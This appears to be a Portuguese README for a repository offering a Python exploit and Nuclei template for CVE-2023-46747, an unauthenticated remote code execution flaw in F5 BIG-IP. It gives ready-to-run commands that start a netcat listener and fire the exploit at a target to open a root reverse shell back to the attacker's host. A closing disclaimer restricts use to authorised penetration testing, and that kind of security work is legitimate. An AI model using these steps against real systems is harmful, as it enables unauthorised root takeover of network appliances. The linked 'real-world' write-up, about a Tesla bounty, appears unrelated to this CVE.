
#F5-BIG-IP-CVE-2023-46747-Exploit – RCE não autenticada Exploit em Python & template Nuclei por Raguraman ✓ Shell reverso TCP automatizado (LHOST/LPORT) ✓ Testado em BIG-IP 13.x–17.x afetados ⚠️ Apenas para testes de pentest autorizados
Versões Python3 e Nuclei – por raguraman
RCE crítico não autenticado (CVSS 9.8) via AJP + contrabando de requisições HTTP
Funciona em todos os BIG-IP sem patch 13.x → 17.x (incluindo o mais recente 17.1.0.3)
Patch: https://my.f5.com/manage/s/article/K000137353 (Novembro 2023)
Write-up de exploração em cenário real: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → Python3 autônomo (recomendado)CVE-2023-46747-revshell.yaml → template Nuclei (opcional)# 1. Inicie seu listener
nc -lvnp 4444
# 2. Execute o exploit (funciona com IP ou domínio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 SEU_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com SEU_IP 4444
# → Shell root instantâneo!
Uso – template Nuclei (alternativa)
Bash # 1. Edite LHOST e LPORT dentro do arquivo YAML
# 2. Inicie o listener
nc -lvnp 4444
# 3. Escaneie
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
# Aviso Legal
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados, tais como:
Compromissos de teste de penetração aprovados
Operações de equipe vermelha com permissão por escrito
Pesquisa em ambiente de laboratório controlado
Não utilize este exploit em sistemas que você não possui ou para os quais não possui permissão explícita para testar.
A exploração não autorizada é ilegal e pode resultar em processo criminal.
Ao usar esta ferramenta, você assume toda a responsabilidade pelo cumprimento das leis aplicáveis.
O autor não se responsabiliza por qualquer uso indevido ou dano.